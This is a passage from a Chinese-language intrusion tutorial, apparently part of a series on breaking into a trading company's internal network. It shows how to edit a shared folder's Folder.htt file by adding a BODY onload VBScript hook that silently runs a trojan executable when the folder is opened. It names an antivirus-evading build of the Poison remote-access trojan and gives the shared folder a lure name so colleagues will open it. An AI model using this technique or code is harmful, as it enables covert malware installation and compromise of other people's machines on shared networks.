对某贸易公司内网的一次安全检测

核心提示： 图14 查看隐藏的文件夹 点击进去后，里面有一个Folder.htt的文件，对某贸易公司内网的一次安全检测(6)，这个就是我们要添加我们脚本的地方了，用UE或者notepad.exe打开Folder.htt，这种攻击方式在我们内网渗透上可以起到一定的效果,当对方只共享部分文件夹的时候我们就

图14 查看隐藏的文件夹

点击进去后，里面有一个Folder.htt的文件，这个就是我们要添加我们脚本的地方了，用UE或者notepad.exe打开Folder.htt，如图15所示。

图15 Folder Settings文件夹中的详细文件

我们在其中添加我们的脚本代码：

在Folder.htt文件前面加：

{BODY onload="vbscript :load()}

注：{ }实为“< >”

图16 在Fold中添加启动代码

在尾部加vbs代码，如图17所示：

图17

图17 在 尾部添加启动木马的vbs脚本

{script language=vbscript}
function load()
set wsh=CreateObject("WScript.Shell")
wsh.run "d:updateupdate.exe",0
end function
{/script}
注：代码中的{ }实为“< >”

保存后，将我们配置好的木马放置共享文件夹下的update文件中，这里我使用的木马是Poison2.31免杀版。这样我们就完成了这个文件夹木马的制作,当你打开“同仁请看”这个文件夹的时候，你就同时调用了我们放在其中的脚本，从而启动了我们的木马。

这种攻击方式在我们内网渗透上可以起到一定的效果,当对方只共享部分文件夹的时候我们就可以在其中添加一些代码,从而达到内网渗透的效果。当然前提必须对方的操作系统是比较久远的版本，例如：Windows 2000 professor、Windows 2000 server以及部分早期的Windows Xp。